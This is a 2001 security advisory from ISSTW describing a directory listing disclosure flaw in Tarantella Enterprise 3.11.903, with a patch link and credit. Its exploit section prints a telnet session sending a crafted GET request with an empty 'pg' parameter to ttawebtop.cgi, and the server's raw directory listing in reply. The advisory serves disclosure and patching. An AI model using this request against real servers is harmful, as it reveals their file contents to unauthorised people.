ISSTW Security Advisory Tarantella Enterprise 3.11.903 Directory Index Disclosure Vulnerability

[advisory <advisory () isstw com>]

ISSTW Security Advisory (ISSTW200201)
Tarantella Enterprise 3.11.903 Directory Index Disclosure Vulnerability

Discovery Date: Fri, 21 Dec 2001
----------------------------------------------------------------------


Overview:
---------
ISSTW Tiger-Force discovered a vulnerability in Tarantella Enterprise 3
that will reveal directory content with the use of blank parameter.


Problem Description:
--------------------
Tarantella Enterprise 3 is a non-intrusive application/data centralization
solution. End users can access enterprise resources via the web interface.
The vulnerability will allow a malicious user to review the directory content.


Exploit:
--------
shell$ telnet tarantella.somewhere.com 80
Trying 12.34.56.78...
Connected to 12.34.56.78.
Escape character is '^]'.
GET /cgi-bin/ttawebtop.cgi/?action=start&pg= HTTP/1.0

HTTP/1.1 200 OK
Date: Fri, 21 Dec 2001 11:34:39 GMT
Server: Apache/1.3.4 (Unix)
Content-length: 512
Connection: close
Content-Type: text/html

  ?C  .    那  ..    4    cgi-bin   ?E   direct.html
   on    examples      ?    
help      ?Y  
index.html    ?Z   index2.html   ?[  
kiosk.html    ?\   kiosk2.html   ?]   loader.html   %
  mac   -v   resources
native   5     java      ?w    index2.html.orig      
�o   modules   姡    tsp les
x    resources.3_11.tar    ,w 
resources.old 


Tested Platform:
---------------
Tarantella Enterprise 3.11.903


Tested OS:
----------
Solaris 7 (Sparc)


Patch Information:
------------------
http://www.tarantella.com/security/bulletin-03.html


Credit:
-------
This vulnerability was discovered and researched by 
Chieh-Chun Lin (cclin () iss com tw)

Disclaimer:

All information in these advisories are subject to change without
any advanced notices neither mutual consensus, and each of them 
is released as it is. ISSTW. is not responsible for any risks of
occurrences caused by applying those information.